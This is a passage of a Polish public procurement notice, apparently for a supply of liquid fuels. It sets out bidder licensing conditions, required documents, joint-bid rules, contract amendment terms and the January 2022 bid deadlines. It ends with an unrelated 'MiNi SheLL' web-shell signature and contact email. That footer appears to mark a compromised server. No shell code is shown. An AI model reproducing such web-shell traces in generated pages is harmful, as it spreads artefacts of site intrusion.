spełniają warunki udziału w postępowaniu, o ile zostały one określone<br/>1.2.	Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1.	zdolności do występowania w obrocie gospodarczym - Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie;<br/><br/>2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – <br/>Zamawiający wymaga, aby Wykonawca posiadał uprawnienia do wykonywania działalności, o której mowa w ustawie Prawo energetyczne z dnia 10 kwietnia 1997 roku (t.j. Dz. U. z 2021 r. poz. 716, ze zmianami), tj. w zakresie obrotu paliwami ciekłymi.<br/><br/>3.	sytuacji ekonomicznej lub finansowej Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie;<br/>4.	zdolności technicznej lub zawodowej Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>1)	wymaganą zgodnie z ustawą Prawo energetyczne z dnia 10 kwietnia 1997 roku (t.j. Dz. U. z 2021 r. poz. 716, ze zmianami) decyzję Prezesa Urzędu Regulacji i Energetyki o udzieleniu koncesji zezwalającej na wykonywanie działalności w zakresie obrotu paliwami ciekłymi (w zakresie paliw stanowiących przedmiot nin. Zamówienia).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.4.	Do oferty Wykonawca zobowiązany jest załączyć:<br/>1)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania,<br/>2)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, gdy umocowanie osoby składającej ofertę nie wynika z dokumentów opisanych w pkt 1),<br/>3)	zobowiązanie, o którym mowa w rozdziale I, sekcja 5 ust. 5.3 oraz 5.4 SWZ w przypadku polegania na zasobach podmiotu udostępniającego zasób Wykonawcy,<br/>4)	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	pełnomocnictwo, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, z treści którego będzie wynikało umocowanie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>-	postępowania o zamówienie publicznego, którego dotyczy,<br/>-	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>-	ustanowionego pełnomocnika oraz zakresu jego pełnomocnictwa,<br/>b)	oświadczenie, o którym mowa w rozdziale I sekcja 4 ust. 4.4 SWZ (Zamawiający dopuszcza złożenia tego oświadczenia na formularzu ofertowym);<br/>1.5.	Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ust. 1.4 pkt. 1), jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>1.6.	Zapisy ust. 1.4 pkt 2) stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>1.7.	Zapisy ust. 1.4 pkt 1) i pkt 2), ust. 1.5 stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>2.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje zamówienia, do których realizacji te uprawnienia są wymagane.<br/>3.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały sformułowane) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają zamówienia, do realizacji których te zdolności są wymagane.<br/>4.	W przypadku, o którym mowa w ust. 2 i 3, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które zamówienia wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany treści umowy mogą być dokonywane wyłącznie w formie pisemnej pod rygorem nieważności.<br/>2. Zmiany do umowy mogą dotyczyć w szczególności zmian przepisów prawa, w tym:<br/>2.1. zmiany stawki podatku VAT na skutek zmian w przepisach prawnych, o ile dojdzie do nich w okresie do 12 miesięcy od dnia zawarcia umowy: <br/>2.1.1. w przypadku zwiększenia stawki podatku VAT – ceny jednostkowe brutto, nie mogą być wyższe niż zadeklarowane. Maksymalna nominalna wartość umowy nie ulegnie zmianie. <br/>2.1.2. w przypadku zmniejszenia stawki podatku VAT – ceny jednostkowe brutto, zostaną odpowiednio pomniejszone. Maksymalna nominalna wartość umowy może ulec zmniejszeniu,<br/>2.2 zmiany stawki podatku Vat na skutek zmian w przepisach prawnych, o ile dojdzie do nich po upływie 12 miesięcy od dnia zawarcia umowy:<br/>2.2.1. w przypadku zwiększenia stawki podatku VAT – ceny jednostkowe brutto ulegną zwiększeniu proporcjonalnie do wzrostu stawki podatku VAT. Maksymalna nominalna wartość umowy nie ulegnie zmianie. <br/>2.2.2. w przypadku zmniejszenia stawki VAT- ceny jednostkowe brutto zostaną proporcjonalnie pomniejszone do obniżonej stawki podatku VAT. Maksymalna nominalna wartość umowy może ulec zmniejszeniu.<br/>2.3. zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>2.4. zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne, <br/>2.5. Jeżeli zmiany, o których mowa w ust. 2.2., 2.3. i 2.4. będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę, każda ze stron w celu dokonania zmiany wynagrodzenia może wystąpić z takim wnioskiem do drugiej strony Umowy. Zmiana umowy w zakresie powyższych punktów może nastąpić po upływie 12 miesięcy od daty podpisania umowy.<br/>2.6. Do wniosku o zmianę wynagrodzenia, w przypadkach określonych w ust. 2.3. i 2.4., należy dołączyć listę pracowników zaangażowanych w realizację Umowy oraz oświadczenie o braku zaległości w opłacaniu składek na ubezpieczenie społeczne i zdrowotne oraz o wypłacie wynagrodzeń pracownikom oraz osobom fizycznym, z którymi zawarto umowy cywilno - prawne. Lista musi zawierać szczegółowe dane dla każdej osoby zaangażowanej w realizację Umowy, w tym pełnioną funkcję, zakres wykonywanych prac przy realizacji zamówienia, rodzaj zawartej z nią umowy, wysokość dotychczas wypłacanego wynagrodzenia oraz wynagrodzenia wypłacanego po zmianie przepisów wraz z należnymi składkami na ubezpieczenie społeczne i zdrowotne. <br/>Pozostałe uregulowania dot. zamian umowy określa §8 projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-31 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ofertę należy składać na Platformie do elektronicznej obsługi zamówieńpublicznych dostępnej pod adresem https://dg.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-31 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com